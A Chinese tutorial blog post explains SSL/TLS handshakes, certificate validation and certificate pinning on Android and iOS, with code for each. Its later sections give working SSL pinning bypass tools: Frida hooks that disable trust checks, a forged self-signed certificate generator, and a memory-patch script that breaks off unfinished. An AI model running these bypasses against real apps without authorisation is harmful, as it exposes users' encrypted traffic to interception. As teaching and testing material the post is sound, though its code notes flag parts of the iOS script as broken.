一枚酸心果子

果子果子果子果子果子~~~

SSL/TLS协议解析:从握手到证书固定

SSL/TLS协议基础

协议发展历程

SSL/TLS协议演进

  • 1994年:SSL 1.0(未发布)
  • 1995年:SSL 2.0(已废弃)
  • 1996年:SSL 3.0(已废弃)
  • 1999年:TLS 1.0
  • 2006年:TLS 1.1
  • 2008年:TLS 1.2
  • 2018年:TLS 1.3

关键变化

  • TLS 1.2:支持更强的加密算法,广泛使用
  • TLS 1.3:简化握手过程,提升安全性,移除弱加密算法

协议在OSI模型中的位置

应用层     | HTTP、HTTPS、SMTP等
表示层     | SSL/TLS(加密、压缩、格式转换)
会话层     | SSL/TLS(会话管理)
传输层     | TCP
网络层     | IP
数据链路层 | 以太网
物理层     | 网线、光纤

重要理解:SSL/TLS并不严格对应OSI模型中的某一层。它运行在传输层(TCP)之上、应用层协议之下,承担了表示层(加密、格式转换)和会话层(会话管理)的部分职责,为上层应用提供加密和认证服务。

TLS握手过程深度分析

TLS 1.2握手流程

客户端                        服务器
  |                             |
  |----- ClientHello ---------->|
  |                             |
  |<---- ServerHello -----------|
  |<---- Certificate -----------|
  |<---- ServerKeyExchange -----|
  |<---- ServerHelloDone -------|
  |                             |
  |----- ClientKeyExchange ---->|
  |----- ChangeCipherSpec ----->|
  |----- Finished ------------->|
  |                             |
  |<---- ChangeCipherSpec ------|
  |<---- Finished --------------|
  |                             |

详细握手分析

1. ClientHello消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# ClientHello消息结构分析
def analyze_client_hello(data):
    """Parse a TLS record that carries a ClientHello handshake message.

    The buffer is expected to start at the 5-byte TLS record header, followed
    by the 4-byte handshake header and the ClientHello body.

    Args:
        data: Bytes-like object holding the record.

    Returns:
        A dict with:
            'version': the 2 raw bytes of the client version field,
            'random': the 32 raw bytes of the client random,
            'cipher_suites': result of parse_cipher_suites() on the suite list,
            'extensions': result of parse_extensions() on the extension block.

    Raises:
        ValueError: if ``data`` is shorter than the fixed-length prefix that
            every ClientHello has (44 bytes up to the session-id length).
    """
    # Record header (5) + handshake header (4) + version (2) + random (32)
    # + session-id length (1).
    fixed_prefix = 44
    if len(data) < fixed_prefix:
        raise ValueError(
            f"ClientHello too short: got {len(data)} bytes, "
            f"need at least {fixed_prefix}"
        )

    # Layout of the prefix, for reference:
    #   data[0]    record content type (0x16 = Handshake)
    #   data[1:3]  record-layer version
    #   data[3:5]  record length
    #   data[5]    handshake type (0x01 = ClientHello)
    #   data[6:9]  handshake length
    client_version = data[9:11]
    client_random = data[11:43]

    # Walk the variable-length fields with a running cursor instead of
    # repeating the accumulated offsets in every slice.
    offset = 43
    session_id_length = data[offset]
    offset += 1 + session_id_length

    cipher_suites_length = int.from_bytes(data[offset:offset + 2], 'big')
    offset += 2
    cipher_suites = data[offset:offset + cipher_suites_length]
    offset += cipher_suites_length

    compression_methods_length = int.from_bytes(data[offset:offset + 1], 'big')
    offset += 1 + compression_methods_length

    # Bound the extension block by its declared length so that bytes of a
    # following record in the same buffer are not parsed as extensions.
    extensions_length = int.from_bytes(data[offset:offset + 2], 'big')
    offset += 2
    extensions = data[offset:offset + extensions_length]

    return {
        'version': client_version,
        'random': client_random,
        'cipher_suites': parse_cipher_suites(cipher_suites),
        'extensions': parse_extensions(extensions),
    }

def parse_cipher_suites(data):
    """Decode a cipher-suite list into integer suite identifiers.

    Args:
        data: Bytes-like object of concatenated 2-byte, big-endian suite IDs.

    Returns:
        List of ints, one per complete 2-byte entry, in wire order. A dangling
        odd byte at the end is ignored rather than decoded as a bogus
        one-byte suite.
    """
    # Stop at len(data) - 1 so only complete 2-byte pairs are decoded.
    return [
        int.from_bytes(data[i:i + 2], 'big')
        for i in range(0, len(data) - 1, 2)
    ]

def parse_extensions(data):
    """Split a TLS extension block into a mapping of type -> raw payload.

    Each extension is encoded as a 2-byte type, a 2-byte length and then
    ``length`` bytes of payload, all big-endian.

    Args:
        data: Bytes-like object holding the extension block without its
            leading 2-byte total-length field.

    Returns:
        Dict mapping the integer extension type to the payload slice. If the
        same type occurs more than once, the last occurrence wins. A payload
        cut short by the end of the buffer is stored as-is (shorter than its
        declared length).
    """
    extensions = {}
    offset = 0

    # A 4-byte header is all a zero-length extension needs, so the loop must
    # also run when exactly 4 bytes remain.
    while offset + 4 <= len(data):
        ext_type = int.from_bytes(data[offset:offset + 2], 'big')
        ext_length = int.from_bytes(data[offset + 2:offset + 4], 'big')
        extensions[ext_type] = data[offset + 4:offset + 4 + ext_length]
        offset += 4 + ext_length

    return extensions

2. ServerHello消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def analyze_server_hello(data):
    """Parse the body of a ServerHello handshake message.

    Unlike analyze_client_hello(), the offsets used here start at the
    server version field, i.e. the record and handshake headers must already
    have been stripped by the caller.

    Args:
        data: Bytes-like object holding the ServerHello body.

    Returns:
        A dict with:
            'version': 2 raw bytes of the server version field,
            'random': 32 raw bytes of the server random,
            'cipher_suite': the selected suite as an int,
            'compression_method': the selected compression method as an int,
            'extensions': result of parse_extensions() on the extension block.

    Raises:
        ValueError: if the buffer ends before the compression-method byte.
    """
    # version (2) + random (32) + session-id length (1)
    if len(data) < 35:
        raise ValueError(
            f"ServerHello too short: got {len(data)} bytes, need at least 35"
        )

    server_version = data[0:2]
    server_random = data[2:34]

    # Skip the session id; only its length is needed to find what follows.
    offset = 35 + data[34]

    # cipher suite (2) + compression method (1) are mandatory.
    if len(data) < offset + 3:
        raise ValueError(
            "ServerHello truncated before cipher suite / compression method"
        )
    cipher_suite = int.from_bytes(data[offset:offset + 2], 'big')
    compression_method = data[offset + 2]
    offset += 3

    # Extensions are optional; a missing block decodes as length 0. Bound the
    # slice by the declared length so trailing bytes are not misparsed.
    extensions_length = int.from_bytes(data[offset:offset + 2], 'big')
    offset += 2
    extensions = data[offset:offset + extensions_length]

    return {
        'version': server_version,
        'random': server_random,
        'cipher_suite': cipher_suite,
        'compression_method': compression_method,
        'extensions': parse_extensions(extensions),
    }

3. Certificate消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
def analyze_certificate_message(data):
    """Parse the body of a Certificate handshake message.

    The layout handled here is a 3-byte total chain length followed by
    entries of (3-byte length, DER certificate).
    NOTE(review): this matches the TLS 1.2-style layout; a TLS 1.3
    Certificate message carries extra fields and is not handled — confirm
    which versions callers pass in.

    Args:
        data: Bytes-like object holding the Certificate message body.

    Returns:
        List with one entry per certificate, each being whatever
        parse_x509_certificate() returns. If an entry's declared length runs
        past the end of the chain, a ``{'error': ...}`` dict is appended for
        it and parsing stops.
    """
    cert_chain_length = int.from_bytes(data[0:3], 'big')
    # Never read past the declared chain, nor past the buffer.
    chain_end = min(len(data), 3 + cert_chain_length)

    certificates = []
    offset = 3

    while offset + 3 <= chain_end:
        cert_length = int.from_bytes(data[offset:offset + 3], 'big')
        offset += 3

        if offset + cert_length > chain_end:
            certificates.append({'error': 'Truncated certificate entry'})
            break

        certificates.append(
            parse_x509_certificate(data[offset:offset + cert_length])
        )
        offset += cert_length

    return certificates

def parse_x509_certificate(cert_data):
    """Decode a DER-encoded X.509 certificate into a summary dict.

    Requires the third-party ``cryptography`` package; it is imported here so
    the rest of the module can be used without it.

    Args:
        cert_data: DER bytes of a single certificate.

    Returns:
        On success, a dict with 'subject' and 'issuer' (RFC 4514 strings),
        'serial_number' (decimal string), 'not_valid_before' /
        'not_valid_after' (as exposed by the certificate object),
        'public_key' (key object), 'signature_algorithm' (OID name) and
        'extensions' (list of extension OID names).
        On any failure, ``{'error': <message>}`` — parsing is best-effort and
        never raises for malformed input.
    """
    from cryptography import x509
    from cryptography.hazmat.backends import default_backend

    try:
        # bytes() lets callers pass bytearray/memoryview slices as well.
        cert = x509.load_der_x509_certificate(bytes(cert_data), default_backend())

        return {
            'subject': cert.subject.rfc4514_string(),
            'issuer': cert.issuer.rfc4514_string(),
            'serial_number': str(cert.serial_number),
            'not_valid_before': cert.not_valid_before,
            'not_valid_after': cert.not_valid_after,
            'public_key': cert.public_key(),
            'signature_algorithm': cert.signature_algorithm_oid._name,
            'extensions': [ext.oid._name for ext in cert.extensions],
        }
    except Exception as e:
        # Deliberately broad: any decoding problem is reported as data.
        return {'error': str(e)}

TLS 1.3握手优化

TLS 1.3的主要改进

传统握手 (TLS 1.2): 2-RTT
TLS 1.3握手: 1-RTT (首次) / 0-RTT (重连)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
def analyze_tls13_handshake(data):
    """Dispatch a TLS record to the matching TLS 1.3 hello parser.

    Args:
        data: Bytes-like object starting at the 5-byte TLS record header.

    Returns:
        The result of analyze_tls13_client_hello() for a ClientHello (0x01),
        the result of analyze_tls13_server_hello() for a ServerHello (0x02),
        or None when the record is not a handshake record, is too short to
        contain a handshake type, or carries another handshake type.
    """
    # Need the record header (5 bytes) plus the handshake-type byte.
    if len(data) < 6 or data[0] != 0x16:  # 0x16 = Handshake
        return None

    handshake_type = data[5]

    if handshake_type == 0x01:  # ClientHello
        return analyze_tls13_client_hello(data)
    if handshake_type == 0x02:  # ServerHello
        # NOTE(review): analyze_tls13_server_hello is not defined in the
        # visible part of this file — confirm it exists elsewhere.
        return analyze_tls13_server_hello(data)

    return None

def analyze_tls13_client_hello(data):
    """Extract PSK / 0-RTT information from a TLS 1.3 ClientHello record.

    Args:
        data: Bytes-like object starting at the 5-byte TLS record header.

    Returns:
        A dict with:
            'version': 2 raw bytes of the version field at offset 9,
            'random': 32 raw bytes of the client random,
            'psk_extensions': list holding the pre_shared_key (type 41)
                payload if present, otherwise empty,
            'supports_0rtt': True only when both pre_shared_key (41) and
                early_data (42) are offered. A PSK alone only indicates
                session resumption.
    """
    # Record header (5) + handshake header (4) + version (2) + random (32).
    offset = 43

    # The extension block follows three variable-length fields, so they have
    # to be skipped one by one; a fixed offset only works if all are empty.
    offset += 1 + int.from_bytes(data[offset:offset + 1], 'big')  # session id
    offset += 2 + int.from_bytes(data[offset:offset + 2], 'big')  # cipher suites
    offset += 1 + int.from_bytes(data[offset:offset + 1], 'big')  # compression

    extensions_length = int.from_bytes(data[offset:offset + 2], 'big')
    offset += 2
    extensions = parse_extensions(data[offset:offset + extensions_length])

    psk_extensions = [extensions[41]] if 41 in extensions else []

    return {
        'version': data[9:11],
        'random': data[11:43],
        'psk_extensions': psk_extensions,
        'supports_0rtt': bool(psk_extensions) and 42 in extensions,
    }

证书验证机制

证书链验证过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
def verify_certificate_chain(certificates, trusted_cas):
    """Validate a certificate chain ordered leaf first.

    Args:
        certificates: Sequence of certificate records; index 0 is the end
            entity, each following entry is expected to be the issuer of the
            one before it.
        trusted_cas: Trust anchors, passed through to the helper checks.

    Returns:
        ``(True, message)`` when every certificate passes, otherwise
        ``(False, reason)`` naming the index of the first failing certificate.
    """
    if not certificates:
        return False, "No certificates provided"

    last_index = len(certificates) - 1

    for i, cert in enumerate(certificates):
        issuer = certificates[i + 1] if i < last_index else None

        if i == 0:
            result = verify_end_entity_certificate(cert, issuer)
            # A lone certificate has no issuer to verify its signature
            # against, so it must itself be a trust anchor; otherwise any
            # self-signed leaf would be accepted.
            # Assumes is_trusted_root_ca(cert, trusted_cas) behaves as in
            # verify_intermediate_ca_certificate — TODO confirm.
            if result[0] and issuer is None and not is_trusted_root_ca(cert, trusted_cas):
                result = (False, "End entity certificate is not anchored to a trusted CA")
        else:
            result = verify_intermediate_ca_certificate(cert, issuer, trusted_cas)

        if not result[0]:
            return False, f"Certificate {i} verification failed: {result[1]}"

    return True, "Certificate chain is valid"

def verify_end_entity_certificate(cert, issuer_cert):
    """Check validity period, key usage and signature of a leaf certificate.

    Args:
        cert: Certificate record with 'not_valid_before' and
            'not_valid_after' datetime entries.
        issuer_cert: Record of the issuing certificate, or None. When None,
            the signature check is skipped.

    Returns:
        ``(True, message)`` if all performed checks pass, otherwise
        ``(False, reason)``.
    """
    from datetime import datetime, timezone

    def _as_utc(moment):
        # Naive validity bounds are taken to be UTC — presumably what the
        # certificate parser produces; verify against the caller.
        if moment.tzinfo is None:
            return moment.replace(tzinfo=timezone.utc)
        return moment

    # Compare in UTC; local wall-clock time would shift the window by the
    # machine's UTC offset.
    now = datetime.now(timezone.utc)
    if now < _as_utc(cert['not_valid_before']) or now > _as_utc(cert['not_valid_after']):
        return False, "Certificate expired or not yet valid"

    if not has_correct_key_usage(cert, 'digitalSignature'):
        return False, "Certificate does not have correct key usage"

    if issuer_cert:
        if not verify_signature(cert, issuer_cert):
            return False, "Certificate signature verification failed"

    return True, "End entity certificate is valid"

def verify_intermediate_ca_certificate(cert, issuer_cert, trusted_cas):
    """Check CA status, validity period and signature/trust of a CA certificate.

    Args:
        cert: Certificate record with 'not_valid_before' and
            'not_valid_after' datetime entries.
        issuer_cert: Record of the issuing certificate, or None when ``cert``
            is the last element of the chain.
        trusted_cas: Trust anchors, consulted only when there is no issuer.

    Returns:
        ``(True, message)`` if all checks pass, otherwise ``(False, reason)``.
    """
    from datetime import datetime, timezone

    if not is_ca_certificate(cert):
        return False, "Not a CA certificate"

    def _as_utc(moment):
        # Naive validity bounds are taken to be UTC — presumably what the
        # certificate parser produces; verify against the caller.
        if moment.tzinfo is None:
            return moment.replace(tzinfo=timezone.utc)
        return moment

    # Compare in UTC; local wall-clock time would shift the window by the
    # machine's UTC offset.
    now = datetime.now(timezone.utc)
    if now < _as_utc(cert['not_valid_before']) or now > _as_utc(cert['not_valid_after']):
        return False, "Certificate expired or not yet valid"

    if issuer_cert:
        if not verify_signature(cert, issuer_cert):
            return False, "Certificate signature verification failed"
    else:
        # End of the chain: the certificate itself has to be a trust anchor.
        if not is_trusted_root_ca(cert, trusted_cas):
            return False, "Not a trusted root CA"

    return True, "Intermediate CA certificate is valid"

证书固定 (Certificate Pinning)

Android中的证书固定

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
// Android证书固定实现
/**
 * Certificate pinning helpers for Android: an OkHttp client with pins
 * configured, and a TrustManager that adds a pin check on top of the
 * platform's normal chain validation.
 */
public class CertificatePinning {
    // Placeholder pin in OkHttp's "sha256/<base64>" format. Replace it with the
    // real pin before use; with this value every connection fails the pin check.
    private static final String PINNED_CERT_SHA256 = "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";

    /**
     * Builds an OkHttpClient that pins example.com and its direct subdomains.
     *
     * @return a client whose TLS connections to those hosts must match the pin
     */
    public static OkHttpClient createPinnedClient() {
        CertificatePinner certificatePinner = new CertificatePinner.Builder()
                .add("example.com", PINNED_CERT_SHA256)
                .add("*.example.com", PINNED_CERT_SHA256)
                .build();

        return new OkHttpClient.Builder()
                .certificatePinner(certificatePinner)
                .build();
    }

    /**
     * TrustManager that first runs the platform's default validation and then
     * requires at least one certificate in the chain to match a pinned hash.
     */
    public static class PinningTrustManager implements X509TrustManager {
        private final X509TrustManager defaultTrustManager;
        private final Set<String> pinnedCertificates;

        /**
         * @param pinnedCerts pins in "sha256/<base64 of SHA-256 over the
         *                    SubjectPublicKeyInfo>" form, i.e. the same format
         *                    createPinnedClient() uses; must not be null
         */
        public PinningTrustManager(Set<String> pinnedCerts) {
            if (pinnedCerts == null) {
                throw new IllegalArgumentException("pinnedCerts must not be null");
            }
            // Defensive copy so later changes by the caller cannot alter the pins.
            this.pinnedCertificates = new java.util.HashSet<>(pinnedCerts);
            this.defaultTrustManager = getDefaultTrustManager();
        }

        /** Looks up the platform's default X509TrustManager. */
        private static X509TrustManager getDefaultTrustManager() {
            try {
                javax.net.ssl.TrustManagerFactory factory = javax.net.ssl.TrustManagerFactory
                        .getInstance(javax.net.ssl.TrustManagerFactory.getDefaultAlgorithm());
                // A null KeyStore selects the system trust store.
                factory.init((java.security.KeyStore) null);
                for (javax.net.ssl.TrustManager manager : factory.getTrustManagers()) {
                    if (manager instanceof X509TrustManager) {
                        return (X509TrustManager) manager;
                    }
                }
            } catch (java.security.GeneralSecurityException e) {
                throw new IllegalStateException("Unable to initialise the default trust manager", e);
            }
            throw new IllegalStateException("No default X509TrustManager available");
        }

        @Override
        public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
            // Delegate instead of accepting everything silently.
            defaultTrustManager.checkClientTrusted(chain, authType);
        }

        @Override
        public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
            // Step 1: normal chain validation.
            try {
                defaultTrustManager.checkServerTrusted(chain, authType);
            } catch (CertificateException e) {
                // Keep the original exception as the cause for diagnostics.
                throw new CertificateException("Default trust manager verification failed", e);
            }

            // Step 2: pin check.
            if (!isCertificatePinned(chain)) {
                throw new CertificateException("Certificate pinning verification failed");
            }
        }

        @Override
        public X509Certificate[] getAcceptedIssuers() {
            return defaultTrustManager.getAcceptedIssuers();
        }

        /** Returns true if any certificate in the chain matches a pin. */
        private boolean isCertificatePinned(X509Certificate[] chain) {
            if (chain == null) {
                return false;
            }
            for (X509Certificate cert : chain) {
                String certHash = getCertificateHash(cert);
                // A null hash means hashing failed; never treat that as a match.
                if (certHash != null && pinnedCertificates.contains(certHash)) {
                    return true;
                }
            }
            return false;
        }

        /**
         * Computes the pin of a certificate: "sha256/" followed by the base64
         * SHA-256 of its encoded public key (SubjectPublicKeyInfo), matching
         * the pin format used by createPinnedClient().
         *
         * @return the pin string, or null if SHA-256 is unavailable
         */
        private String getCertificateHash(X509Certificate cert) {
            try {
                MessageDigest digest = MessageDigest.getInstance("SHA-256");
                byte[] publicKeyBytes = cert.getPublicKey().getEncoded();
                byte[] hash = digest.digest(publicKeyBytes);
                return "sha256/" + Base64.encodeToString(hash, Base64.NO_WRAP);
            } catch (java.security.NoSuchAlgorithmException e) {
                return null;
            }
        }
    }
}

iOS中的证书固定

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// iOS证书固定实现
import Security
import Foundation

/// Holds the pinned certificates and builds a URLSession that enforces them.
class CertificatePinning {
    /// Certificate data that server certificates are compared against.
    static let pinnedCertificates: [Data] = [
        // Bundled certificate data goes here.
    ]

    /// Creates a session with the default configuration whose authentication
    /// challenges are handled by a `CertificatePinningDelegate`.
    static func createPinnedSession() -> URLSession {
        let pinningDelegate = CertificatePinningDelegate()
        return URLSession(
            configuration: URLSessionConfiguration.default,
            delegate: pinningDelegate,
            delegateQueue: nil
        )
    }
}

/// URLSession delegate that accepts a server only if its certificate chain is
/// trusted by the system AND its leaf certificate is one of the pinned ones.
class CertificatePinningDelegate: NSObject, URLSessionDelegate {
    func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) {

        // Pinning only concerns server-trust challenges; other kinds (e.g.
        // HTTP authentication) go through default handling.
        guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust else {
            completionHandler(.performDefaultHandling, nil)
            return
        }

        guard let serverTrust = challenge.protectionSpace.serverTrust else {
            completionHandler(.cancelAuthenticationChallenge, nil)
            return
        }

        // Validate the chain. SecTrustEvaluateWithError (iOS 12+) returns the
        // verdict directly; checking only that an evaluation call completed
        // would not tell whether the chain is actually trusted.
        var evaluationError: CFError?
        guard SecTrustEvaluateWithError(serverTrust, &evaluationError) else {
            completionHandler(.cancelAuthenticationChallenge, nil)
            return
        }

        // Pin check.
        if isCertificatePinned(serverTrust: serverTrust) {
            let credential = URLCredential(trust: serverTrust)
            completionHandler(.useCredential, credential)
        } else {
            completionHandler(.cancelAuthenticationChallenge, nil)
        }
    }

    /// Returns true when the certificate at index 0 of the trust object is
    /// byte-for-byte equal to one of `CertificatePinning.pinnedCertificates`.
    private func isCertificatePinned(serverTrust: SecTrust) -> Bool {
        guard let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0) else {
            return false
        }

        // Toll-free bridging avoids the raw byte pointer and its force unwrap.
        let serverCertData = SecCertificateCopyData(serverCertificate) as Data

        return CertificatePinning.pinnedCertificates.contains(serverCertData)
    }
}

SSL Pinning绕过技术

Frida Hook绕过

Android SSL Pinning绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
// Frida脚本:绕过Android SSL Pinning
// Frida script for security testing: replaces the certificate checks of
// X509TrustManager, OkHttp's CertificatePinner and (if present) wraps
// TrustKit.getInstance, logging each call.
// NOTE(review): nothing here wraps the calls in Java.perform — confirm the
// caller does so before invoking this function.
function bypass_android_ssl_pinning() {
// Frida wrappers for the trust-manager type and the certificate class.
// NOTE(review): javax.net.ssl.X509TrustManager is an interface — confirm that
// assigning .implementation on it affects the concrete classes under test.
var X509TrustManager = Java.use("javax.net.ssl.X509TrustManager");
var X509Certificate = Java.use("java.security.cert.X509Certificate");

// Replace checkClientTrusted
X509TrustManager.checkClientTrusted.implementation = function(chain, authType) {
console.log("[+] checkClientTrusted called");
// Return immediately without validating anything
};

// Replace checkServerTrusted
X509TrustManager.checkServerTrusted.implementation = function(chain, authType) {
console.log("[+] checkServerTrusted called");
// Return immediately without validating anything
};

// Replace getAcceptedIssuers so it reports an empty issuer array
X509TrustManager.getAcceptedIssuers.implementation = function() {
console.log("[+] getAcceptedIssuers called");
return Java.array("java.security.cert.X509Certificate", []);
};

// Replace OkHttp's CertificatePinner.check(String, List); the try/catch keeps
// the script going when the class or overload cannot be resolved
try {
var CertificatePinner = Java.use("okhttp3.CertificatePinner");
CertificatePinner.check.overload("java.lang.String", "java.util.List").implementation = function(hostname, peerCertificates) {
console.log("[+] CertificatePinner.check called for: " + hostname);
// Return immediately, skipping the pin check
};
} catch (e) {
console.log("[-] OkHttp CertificatePinner not found");
}

// Wrap TrustKit.getInstance; this only logs and then forwards the call, it
// does not change TrustKit's result
try {
var TrustKit = Java.use("com.datatheorem.android.trustkit.TrustKit");
TrustKit.getInstance.implementation = function() {
console.log("[+] TrustKit.getInstance called");
return this.getInstance();
};
} catch (e) {
console.log("[-] TrustKit not found");
}
}

iOS SSL Pinning绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// Frida脚本:绕过iOS SSL Pinning
// Frida script for security testing: forces the return values of
// SecTrustEvaluate / SecTrustEvaluateWithError and attaches to the
// NSURLSessionDelegate challenge method, logging each call.
function bypass_ios_ssl_pinning() {
// Attach to SecTrustEvaluate if the Security module exports it
var SecTrustEvaluate = Module.findExportByName("Security", "SecTrustEvaluate");
if (SecTrustEvaluate) {
Interceptor.attach(SecTrustEvaluate, {
onEnter: function(args) {
console.log("[+] SecTrustEvaluate called");
},
onLeave: function(retval) {
// Overwrite the return value with 0
console.log("[+] Forcing SecTrustEvaluate to return success");
retval.replace(ptr(0)); // errSecSuccess
}
});
}

// Attach to SecTrustEvaluateWithError (iOS 12+) if exported
var SecTrustEvaluateWithError = Module.findExportByName("Security", "SecTrustEvaluateWithError");
if (SecTrustEvaluateWithError) {
Interceptor.attach(SecTrustEvaluateWithError, {
onEnter: function(args) {
console.log("[+] SecTrustEvaluateWithError called");
},
onLeave: function(retval) {
// Overwrite the return value with 1 (true)
console.log("[+] Forcing SecTrustEvaluateWithError to return true");
retval.replace(ptr(1));
}
});
}

// Attach to the delegate's challenge handler.
// NOTE(review): NSURLSessionDelegate is a protocol name — confirm that
// ObjC.classes actually exposes an entry for it; if not, this branch never runs.
var NSURLSessionDelegate = ObjC.classes.NSURLSessionDelegate;
if (NSURLSessionDelegate) {
var originalDidReceiveChallenge = NSURLSessionDelegate['- URLSession:didReceiveChallenge:completionHandler:'];
Interceptor.attach(originalDidReceiveChallenge.implementation, {
onEnter: function(args) {
console.log("[+] NSURLSessionDelegate didReceiveChallenge called");
},
onLeave: function(retval) {
// Intended to rewrite the completionHandler invocation.
// NOTE(review): `args` is a parameter of onEnter only and is not in scope
// here; the new block.implementation also calls itself. Both need fixing
// before this branch can work.
var completionHandler = args[4];
var block = new ObjC.Block(completionHandler);
block.implementation = function(disposition, credential) {
console.log("[+] Modified completionHandler called");
// Force use of the supplied credential
block.implementation(0, credential); // URLSessionAuthChallengeUseCredential
};
}
});
}
}

证书替换绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# Python脚本:证书替换绕过
import ssl
import socket
from cryptography import x509
from cryptography.hazmat.backends import default_backend

class CertificateReplacer:
    """Fetch a server's certificate and build a self-signed stand-in for it.

    Intended for authorised security testing. Relies on the module-level
    ``ssl``, ``socket``, ``x509`` and ``default_backend`` imports.

    Attributes are plain instance fields:
        target_host / target_port: endpoint whose certificate is fetched.
        original_cert: certificate returned by get_server_certificate().
        replacement_cert: certificate built by create_replacement_certificate().
        replacement_key: private key belonging to ``replacement_cert``.
    """

    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port
        self.original_cert = None
        self.replacement_cert = None
        # Kept so the generated certificate can actually be used; without its
        # private key a certificate is of no use to a TLS endpoint.
        self.replacement_key = None

    def get_server_certificate(self):
        """Connect to the target and return its leaf certificate.

        Verification is switched off on purpose: the goal is to read whatever
        certificate the server presents, valid or not.

        Returns:
            The parsed certificate, or None if the connection or parsing
            failed (the error is printed).
        """
        try:
            context = ssl.create_default_context()
            # check_hostname must be cleared before verify_mode can be relaxed.
            context.check_hostname = False
            context.verify_mode = ssl.CERT_NONE

            with socket.create_connection((self.target_host, self.target_port)) as sock:
                with context.wrap_socket(sock, server_hostname=self.target_host) as ssock:
                    cert_der = ssock.getpeercert(binary_form=True)

            self.original_cert = x509.load_der_x509_certificate(cert_der, default_backend())
            return self.original_cert
        except Exception as e:
            print(f"获取服务器证书失败: {e}")
            return None

    def create_replacement_certificate(self):
        """Generate a self-signed certificate for ``target_host``.

        A fresh 2048-bit RSA key is generated; the certificate is valid for
        365 days from now and lists the host as its common name and as a DNS
        subject alternative name.

        Returns:
            The new certificate. It is also stored in ``replacement_cert``
            and its key in ``replacement_key``.
        """
        from cryptography import x509
        from cryptography.x509.oid import NameOID
        from cryptography.hazmat.primitives import hashes
        from cryptography.hazmat.primitives.asymmetric import rsa
        import datetime

        private_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend(),
        )

        # Self-signed: subject and issuer are the same name.
        subject = issuer = x509.Name([
            x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
            x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, "CA"),
            x509.NameAttribute(NameOID.LOCALITY_NAME, "San Francisco"),
            x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Test Company"),
            x509.NameAttribute(NameOID.COMMON_NAME, self.target_host),
        ])

        # One timezone-aware timestamp for both bounds, so the validity
        # window is exactly 365 days.
        now = datetime.datetime.now(datetime.timezone.utc)

        builder = (
            x509.CertificateBuilder()
            .subject_name(subject)
            .issuer_name(issuer)
            .public_key(private_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now)
            .not_valid_after(now + datetime.timedelta(days=365))
            .add_extension(
                x509.SubjectAlternativeName([x509.DNSName(self.target_host)]),
                critical=False,
            )
        )
        cert = builder.sign(private_key, hashes.SHA256(), default_backend())

        self.replacement_key = private_key
        self.replacement_cert = cert
        return cert

    def save_certificate(self, cert, filename):
        """Write ``cert`` to ``filename`` in PEM format."""
        # Imported here because the module-level imports do not provide it.
        from cryptography.hazmat.primitives import serialization

        with open(filename, 'wb') as f:
            f.write(cert.public_bytes(serialization.Encoding.PEM))

    def load_certificate(self, filename):
        """Read a PEM certificate from ``filename`` and return it parsed."""
        with open(filename, 'rb') as f:
            cert_data = f.read()
        return x509.load_pem_x509_certificate(cert_data, default_backend())

进阶绕过技术

内存补丁绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Python脚本:内存补丁绕过SSL Pinning
import frida
import sys

def on_message(message, data):
    """Print a message received from the injected Frida script.

    Args:
        message: Dict delivered by Frida; 'send' messages carry a 'payload'.
        data: Optional binary attachment; not used.
    """
    if message['type'] == 'send':
        print(f"[*] {message['payload']}")
    else:
        # Anything else is dumped whole so no detail is lost.
        print(message)

def bypass_ssl_pinning_with_memory_patch():
    """Inject a Frida script into ``com.example.app`` on a USB device.

    For authorised security testing. The injected JavaScript replaces two
